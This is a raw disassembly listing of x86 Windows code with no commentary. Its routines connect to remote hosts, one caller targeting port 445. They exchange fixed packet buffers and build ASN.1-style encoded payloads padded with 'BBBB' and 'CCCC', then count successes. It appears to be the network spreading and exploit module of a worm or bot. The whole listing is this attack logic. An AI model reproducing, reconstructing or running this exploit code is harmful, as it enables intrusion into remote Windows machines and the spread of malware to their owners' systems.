push eax
call sub_415390
mov eax, [ebp+arg_C0]
push 4
imul eax, 3Ch
lea eax, dword_425F98[eax]
mov [ebp+var_14], eax
push eax
lea eax, [ebp+var_14E0]
push eax
call sub_4153F0
mov esi, offset loc_4257A0
push esi
call sub_415B10
push eax
lea eax, [ebp+var_14D0]
push esi
push eax
call sub_4153F0
push 4
lea eax, [ebp+var_11AC]
push offset loc_4250FC
push eax
call sub_4153F0
push 4
lea eax, [ebp+var_11A8]
push [ebp+var_14]
push eax
call sub_4153F0
add esp, 40h
push esi
call sub_415B10
push eax
lea eax, [ebp+var_119C]
push esi
push eax
call sub_4153F0
add esp, 10h
xor eax, eax
loc_4039E3: ; CODE XREF: sub_403833+1C8�j
mov cl, [ebp+eax+var_1CC4]
mov [ebp+eax*2+var_4803], bl
mov [ebp+eax*2+var_4804], cl
inc eax
cmp eax, edi
jl short loc_4039E3
mov esi, 1C52h
lea eax, [ebp+var_89B4]
push esi
push 31h
push eax
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call sub_415390
push esi
lea eax, [ebp+var_68DC]
push 31h
push eax
call sub_415390
add esp, 18h
jmp short loc_403A88
; ---------------------------------------------------------------------------
loc_403A31: ; CODE XREF: sub_403833+119�j
push 7D0h
lea eax, [ebp+var_F14]
push 90h
push eax
call sub_415390
mov esi, offset loc_4257A0
push esi
call sub_415B10
push eax
lea eax, [ebp+var_E74]
push esi
push eax
call sub_4153F0
lea eax, [ebp+var_10]
push eax
call sub_415B10
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_758]
push eax
call sub_4153F0
mov eax, dword_425F98
add esp, 2Ch
mov [ebp+var_768], eax
loc_403A88: ; CODE XREF: sub_403833+1FC�j
push 0E29h
lea eax, [ebp+var_2CA8]
push 31h
push eax
call sub_415390
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
add eax, 4
push ebx
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_403AC7
loc_403AC0: ; CODE XREF: sub_403833+2BB�j
; sub_403833+2E2�j ...
xor al, al
jmp loc_403C6F
; ---------------------------------------------------------------------------
loc_403AC7: ; CODE XREF: sub_403833+28B�j
mov esi, 640h
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_43CA3C ; recv
push ebx
push 68h
push offset dword_425BC0
push edi
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz short loc_403AC0
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_43CA3C ; recv
push ebx
push 0A0h
push offset dword_425C30
push edi
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz short loc_403AC0
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_43CA3C ; recv
cmp [ebp+arg_C0], ebx
jz loc_403BDD
push 68h
lea eax, [ebp+var_89B4]
push offset dword_425DF0
push eax
call sub_4153F0
lea eax, [ebp+var_4804]
push 1B5Ah
push eax
lea eax, [ebp+var_894C]
push eax
call sub_4153F0
push 70h
lea eax, [ebp+var_68DC]
push offset dword_425E60
push eax
call sub_4153F0
lea eax, [ebp+var_3770]
push 0A5Eh
push eax
lea eax, [ebp+var_686C]
push eax
call sub_4153F0
push 84h
lea eax, [ebp+var_5DA8]
push offset dword_425ED8
push eax
call sub_4153F0
add esp, 3Ch
lea eax, [ebp+var_89B4]
push ebx
push 10FCh
push eax
push edi
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz loc_403AC0
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_43CA3C ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_403C33
; ---------------------------------------------------------------------------
loc_403BDD: ; CODE XREF: sub_403833+2FA�j
push 7Ch
lea eax, [ebp+var_2CA8]
push offset dword_425CD8
push eax
call sub_4153F0
lea eax, [ebp+var_F14]
push 7D0h
push eax
lea eax, [ebp+var_2C2C]
push eax
call sub_4153F0
push 90h
lea eax, [ebp+var_245C]
push offset off_425D58
push eax
call sub_4153F0
add esp, 24h
mov [ebp+var_1FB1], bl
lea eax, [ebp+var_2CA8]
push ebx
push 0CF8h
loc_403C33: ; CODE XREF: sub_403833+3A8�j
push eax
push edi
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz loc_403AC0
push 12Ch
call dword_421060 ; Sleep
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4036D2
add esp, 0BCh
test al, al
setnz al
loc_403C6F: ; CODE XREF: sub_403833+28F�j
pop edi
pop esi
pop ebx
leave
retn
sub_403833 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C74 proc near ; CODE XREF: .text:00402FB3�p
; .text:00403E5D�p ...
var_854 = byte ptr -854h
var_810 = byte ptr -810h
var_214 = byte ptr -214h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
push 0BB80h
push 76Ch
call sub_413F12
xor edi, edi
push 10h
lea eax, [ebp+var_14]
push edi
push eax
mov [ebp+var_4], edi
call sub_415390
add esp, 14h
lea eax, [ebp+arg_4]
mov [ebp+var_14], 2
push eax
call dword_43CA64 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_10], eax
call dword_43CA24 ; ntohs
push 6
push 1
push 2
mov [ebp+var_12], ax
call dword_43CAA4 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_403D7C
lea eax, [ebp+var_14]
push 10h
push eax
push ebx
call dword_43C9CC ; connect
cmp eax, 0FFFFFFFFh
jz loc_403D7C
push edi
push 89h
push offset dword_425938
push ebx
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz short loc_403D7C
mov esi, 640h
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_43CA3C ; recv
push edi
push 0A8h
push offset dword_4259C8
push ebx
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz short loc_403D7C
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_43CA3C ; recv
push edi
push 0DEh
push offset dword_425A78
push ebx
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz short loc_403D7C
push edi
lea eax, [ebp+var_854]
push esi
push eax
push ebx
call dword_43CA3C ; recv
movsx eax, [ebp+var_810]
sub eax, 30h
jz short loc_403D86
dec eax
jz short loc_403D83
loc_403D7C: ; CODE XREF: sub_403C74+63�j
; sub_403C74+79�j ...
xor eax, eax
jmp loc_403E1C
; ---------------------------------------------------------------------------
loc_403D83: ; CODE XREF: sub_403C74+106�j
push edi
jmp short loc_403DAA
; ---------------------------------------------------------------------------
loc_403D86: ; CODE XREF: sub_403C74+103�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403833
add esp, 0C4h
test al, al
jnz short loc_403DCA
push 1
loc_403DAA: ; CODE XREF: sub_403C74+110�j
push ebx
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403833
add esp, 0C4h
test al, al
jz short loc_403DD1
loc_403DCA: ; CODE XREF: sub_403C74+132�j
mov [ebp+var_4], 1
loc_403DD1: ; CODE XREF: sub_403C74+154�j
push ebx
call dword_43CABC ; closesocket
cmp [ebp+var_4], 0
jz short loc_403E19
push 0
lea eax, [ebp+var_214]
push [ebp+arg_B0]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_412BD1
lea eax, [ebp+var_214]
push eax
call sub_40B078
mov eax, [ebp+arg_A8]
add esp, 18h
imul eax, 3Ch
lea eax, dword_427390[eax]
inc dword ptr [eax]
loc_403E19: ; CODE XREF: sub_403C74+168�j
xor eax, eax
inc eax
loc_403E1C: ; CODE XREF: sub_403C74+10A�j
pop edi
pop esi
pop ebx
leave
retn
sub_403C74 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
sub esp, 0BCh
lea esi, [ebp+8]
mov dword ptr [ebp+0A8h], 1BDh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_402DD1
push 2Fh
lea esi, [ebp+8]
pop ecx
mov dword ptr [ebp+0A8h], 1BDh
mov edi, esp
mov [ebp-4], eax
rep movsd
call sub_403C74
add esp, 0BCh
cmp dword ptr [ebp-4], 0
jnz short loc_403E72
test eax, eax
jz short loc_403E75
loc_403E72: ; CODE XREF: .text:00403E6C�j
xor eax, eax
inc eax
loc_403E75: ; CODE XREF: .text:00403E70�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_403E79 proc near ; CODE XREF: sub_4040E5+E�p
; sub_4040E5+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_403E79 endp
; =============== S U B R O U T I N E =======================================
sub_403E83 proc near ; CODE XREF: sub_4040E5+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
push ebx
mov esi, ecx
call sub_415BE9
mov edi, eax
pop ecx
test edi, edi
jz short loc_403EB5
push ebx
push 0
push edi
call sub_415390
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_4153F0
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_403EB5: ; CODE XREF: sub_403E83+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_403E83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403EBD proc near ; CODE XREF: sub_403FAF+18�p
; sub_404029+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
mov ecx, [ebp+arg_C]
push esi
push edi
lea edi, [eax+ecx]
push edi
call sub_415BE9
mov esi, eax
pop ecx
test esi, esi
jz short loc_403F09
push edi
push 0
push esi
call sub_415390
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_4153F0
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_4153F0
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_403F09: ; CODE XREF: sub_403EBD+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_403EBD endp
; =============== S U B R O U T I N E =======================================
sub_403F12 proc near ; CODE XREF: sub_403FAF+5E�p
; sub_403FAF+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_403F22
push eax
call sub_415C9B
pop ecx
loc_403F22: ; CODE XREF: sub_403F12+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_403F12 endp
; =============== S U B R O U T I N E =======================================
sub_403F2B proc near ; CODE XREF: sub_403FAF+20�p
; sub_40408A+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_403F55
xor ebx, ebx
cmp eax, 7Fh
setnl bl
lea ebx, [ebx+ebx+1]
add eax, ebx
push eax
call sub_415BE9
mov edi, eax
pop ecx
test edi, edi
jnz short loc_403F59
loc_403F55: ; CODE XREF: sub_403F2B+D�j
xor al, al
jmp short loc_403FAB
; ---------------------------------------------------------------------------
loc_403F59: ; CODE XREF: sub_403F2B+28�j
mov eax, [esi+4]
add eax, ebx
push eax
push 0
push edi
call sub_415390
add esp, 0Ch
cmp ebx, 1
jnz short loc_403F79
mov al, [esi+4]
mov [edi], al
lea eax, [edi+1]
jmp short loc_403F8E
; ---------------------------------------------------------------------------
loc_403F79: ; CODE XREF: sub_403F2B+42�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
lea eax, [edi+3]
loc_403F8E: ; CODE XREF: sub_403F2B+4C�j
push dword ptr [esi+4]
push dword ptr [esi]
push eax
call sub_4153F0
add esp, 0Ch
push dword ptr [esi]
call sub_415C9B
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_403FAB: ; CODE XREF: sub_403F2B+2C�j
pop edi
pop esi
pop ebx
retn
sub_403F2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FAF proc near ; CODE XREF: sub_4040E5+89�p
; sub_4040E5+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset dword_43B668
call sub_403EBD
lea ecx, [ebp+var_8]
call sub_403F2B
mov eax, [ebp+var_4]
inc eax
push eax
call sub_415BE9
mov edi, eax
pop ecx
test edi, edi
jnz short loc_403FE9
xor al, al
jmp short loc_404025
; ---------------------------------------------------------------------------
loc_403FE9: ; CODE XREF: sub_403FAF+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_415390
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_4153F0
add esp, 18h
mov ecx, esi
call sub_403F12
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_403F12
mov al, 1
loc_404025: ; CODE XREF: sub_403FAF+38�j
pop edi
pop esi
leave
retn
sub_403FAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404029 proc near ; CODE XREF: sub_40405D+14�p
; sub_40407A+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_403EBD
mov ecx, esi
call sub_403F12
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_404029 endp
; =============== S U B R O U T I N E =======================================
sub_40405D proc near ; CODE XREF: sub_4040E5+F0�p
; sub_4040E5+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_415B10
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_404029
pop esi
retn 4
sub_40405D endp
; =============== S U B R O U T I N E =======================================
sub_40407A proc near ; CODE XREF: sub_4040C6+B�p
; sub_4040E5+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_404029
retn 8
sub_40407A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40408A proc near ; CODE XREF: sub_4040C6+16�p
; sub_4040E5+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_403F2B
test al, al
jz short loc_4040C3
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push (offset loc_426447+1)
call sub_403EBD
mov ecx, esi
call sub_403F12
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_4040C3: ; CODE XREF: sub_40408A+F�j
pop esi
leave
retn
sub_40408A endp
; =============== S U B R O U T I N E =======================================
sub_4040C6 proc near ; CODE XREF: sub_4040E5+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40407A
test al, al
jz short loc_4040E1
mov ecx, esi
call sub_40408A
loc_4040E1: ; CODE XREF: sub_4040C6+12�j
pop esi
retn 8
sub_4040C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040E5 proc near ; CODE XREF: .text:0040495C�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_403E79
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_404429
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_404429
push esi
lea ecx, [ebp+var_30]
call sub_403E79
lea ecx, [ebp+var_20]
call sub_403E79
lea ecx, [ebp+var_50]
call sub_403E79
lea ecx, [ebp+var_18]
call sub_403E79
lea ecx, [ebp+var_40]
call sub_403E79
lea ecx, [ebp+var_38]
call sub_403E79
lea ecx, [ebp+var_28]
call sub_403E79
push 4
push offset dword_4260DC
lea ecx, [ebp+var_30]
call sub_404029
push 3
push offset dword_4260E4
lea ecx, [ebp+var_30]
call sub_404029
lea ecx, [ebp+var_30]
call sub_403FAF
lea ecx, [ebp+var_30]
call sub_40408A
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_415390
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_404029
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_404029
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_404029
lea ecx, [ebp+var_20]
call sub_403FAF
push offset loc_426470
lea ecx, [ebp+var_50]
call sub_40405D
lea ecx, [ebp+var_50]
call sub_403FAF
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_403E83
lea ecx, [ebp+var_58]
call sub_403FAF
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_4040C6
lea ecx, [ebp+var_58]
call sub_403F12
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_415390
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_40405D
push 4
push offset dword_4260E8
lea ecx, [ebp+var_18]
call sub_404029
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_404029
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_404029
lea ecx, [ebp+var_18]
call sub_403FAF
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_40407A
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_40407A
lea ecx, [ebp+var_40]
call sub_40408A
lea ecx, [ebp+var_18]
call sub_403F12
lea ecx, [ebp+var_50]
call sub_403F12
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_40407A
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_40407A
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_40407A
lea ecx, [ebp+var_38]
call sub_40408A
lea ecx, [ebp+var_20]
call sub_403F12
lea ecx, [ebp+var_30]
call sub_403F12
lea ecx, [ebp+var_40]
call sub_403F12
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_404029
lea ecx, [ebp+var_28]
call sub_403FAF
push 2
push offset dword_426464
lea ecx, [ebp+var_28]
call sub_404029
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_40407A
lea ecx, [ebp+var_28]
call sub_40408A
lea ecx, [ebp+var_38]
call sub_403F12
lea ecx, [ebp+var_10]
call sub_403E79
lea ecx, [ebp+var_8]
call sub_403E79
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_40407A
lea ecx, [ebp+var_10]
call sub_403F2B
lea ecx, [ebp+var_28]
call sub_403F12
push offset dword_426460
lea ecx, [ebp+var_8]
call sub_40405D
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40407A
lea ecx, [ebp+var_8]
call sub_403F2B
lea ecx, [ebp+var_10]
call sub_403F12
push offset dword_42645C
lea ecx, [ebp+var_10]
call sub_40405D
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_40407A
lea ecx, [ebp+var_10]
call sub_403F2B
lea ecx, [ebp+var_8]
call sub_403F12
push offset dword_426450
lea ecx, [ebp+var_8]
call sub_40405D
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40407A
lea ecx, [ebp+var_8]
call sub_403F2B
lea ecx, [ebp+var_10]
call sub_403F12
push offset dword_42644C
lea ecx, [ebp+var_48]
call sub_40405D
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_40407A
lea ecx, [ebp+var_8]
call sub_403F12
pop esi
loc_404429: ; CODE XREF: sub_4040E5+1B�j
; sub_4040E5+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop edi
pop ebx
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
leave
retn
sub_4040E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40443B proc near ; CODE XREF: sub_4044FF+A2�p
; sub_4044FF+C7�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
push edi
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
xor edi, edi
push eax
lea eax, [esi+1]
inc edi
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call dword_4211D4 ; select
cmp eax, edi
jnz short loc_4044A2
lea eax, [ebp+var_10C]
push eax
push esi
call sub_420A06 ; __WSAFDIsSet
test eax, eax
jnz short loc_4044A6
loc_4044A2: ; CODE XREF: sub_40443B+54�j
xor eax, eax
jmp short loc_4044B6
; ---------------------------------------------------------------------------
loc_4044A6: ; CODE XREF: sub_40443B+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_43CA3C ; recv
loc_4044B6: ; CODE XREF: sub_40443B+69�j
pop edi
pop esi
leave
retn
sub_40443B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044BA proc near ; CODE XREF: sub_4044FF+80�p
; sub_4044FF+AE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_43CA20 ; ntohl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call dword_43CA74 ; send
cmp eax, 4
jz short loc_4044E4
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4044E4: ; CODE XREF: sub_4044BA+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_43CA74 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_4044BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044FF proc near ; CODE XREF: sub_4045DE+48�p
; .text:00404A4D�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_415BE9
mov esi, eax
pop ecx
test esi, esi
jnz short loc_404528
xor al, al
jmp loc_4045D9
; ---------------------------------------------------------------------------
loc_404528: ; CODE XREF: sub_4044FF+20�j
push ebx
push 0
push esi
call sub_415390
push 2Fh
push offset dword_426178
push esi
call sub_4153F0
push 8
lea eax, [esi+31h]
push offset dword_4261A8
push eax
mov [esi+2Fh], di
call sub_4153F0
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_4153F0
push 6
add ebx, edi
push offset dword_43B660
push ebx
call sub_4153F0
push 85h
push offset dword_4260F0
push [ebp+arg_0]
call sub_4044BA
add esp, 48h
test al, al
jnz short loc_40458F
loc_40458B: ; CODE XREF: sub_4044FF+B8�j
xor bl, bl
jmp short loc_4045D0
; ---------------------------------------------------------------------------
loc_40458F: ; CODE XREF: sub_4044FF+8A�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_0]
call sub_40443B
push [ebp+var_4]
push esi
push [ebp+arg_0]
call sub_4044BA
add esp, 1Ch
test al, al
jz short loc_40458B
push 0
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_0]
call sub_40443B
add esp, 10h
mov bl, 1
loc_4045D0: ; CODE XREF: sub_4044FF+8E�j
push esi
call sub_415C9B
pop ecx
mov al, bl
loc_4045D9: ; CODE XREF: sub_4044FF+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_4044FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045DE proc near ; CODE XREF: .text:00404A33�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_4261B8
push [ebp+arg_0]
call dword_4211F0 ; send
cmp eax, 48h
jnz short loc_404619
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_40443B
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_404619
cmp [ebp+var_20], 82h
jz short loc_40461D
loc_404619: ; CODE XREF: sub_4045DE+1B�j
; sub_4045DE+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40461D: ; CODE XREF: sub_4045DE+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4044FF
add esp, 0Ch
leave
retn
sub_4045DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404630 proc near ; CODE XREF: sub_40467C+2D�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul dbl_421248
call sub_415E24
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul dbl_421240
fstp [esp+10h+var_10]
call sub_415D04
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_415E24
inc eax
leave
retn
sub_404630 endp
; =============== S U B R O U T I N E =======================================
sub_40467C proc near ; CODE XREF: sub_40481B+24�p
var_40 = qword ptr -40h
mov eax, offset loc_420B63
call sub_4162F0
sub esp, 2Ch
push ebx
push esi
push edi
xor edi, edi
mov [ebp-20h], edi
mov al, [ebp+13h]
push edi
lea ecx, [ebp-38h]
mov [ebp-38h], al
call sub_404CE4
push dword ptr [ebp+10h]
xor ebx, ebx
inc ebx
mov [ebp-4], ebx
call sub_404630
cmp [ebp-2Ch], eax
pop ecx
jnb short loc_4046BE
push edi
push eax
lea ecx, [ebp-38h]
call sub_404C5E
loc_4046BE: ; CODE XREF: sub_40467C+36�j
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_4047DC
mov ebx, [ebp+10h]
loc_4046CD: ; CODE XREF: sub_40467C+157�j
cmp dword ptr [ebp+10h], 3
jb short loc_4046D8
push 3
loc_4046D5: ; CODE XREF: sub_40467C+64�j
pop ebx
jmp short loc_4046EB
; ---------------------------------------------------------------------------
loc_4046D8: ; CODE XREF: sub_40467C+55�j
cmp dword ptr [ebp+10h], 2
jnz short loc_4046E2
push 2
jmp short loc_4046D5
; ---------------------------------------------------------------------------
loc_4046E2: ; CODE XREF: sub_40467C+60�j
cmp dword ptr [ebp+10h], 1
jnz short loc_4046EB
xor ebx, ebx
inc ebx
